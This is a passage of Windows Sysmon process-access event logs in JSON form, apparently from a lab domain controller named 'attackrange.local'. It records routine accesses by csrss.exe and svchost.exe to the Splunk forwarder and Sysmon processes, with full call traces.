{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2912,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.525\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0236-5F25-0000-0010CE040500}\r\nTargetProcessId: 1176\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.525","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0236-5F25-0000-0010CE040500}","TargetProcessId":"1176","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2913,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.525\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.525","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2914,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.525\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.525","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2915,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.525\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.525","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2916,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.525\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.525","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2917,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.525\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.525","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2918,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.525\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.525","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2919,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.525\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.525","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2920,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.525\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 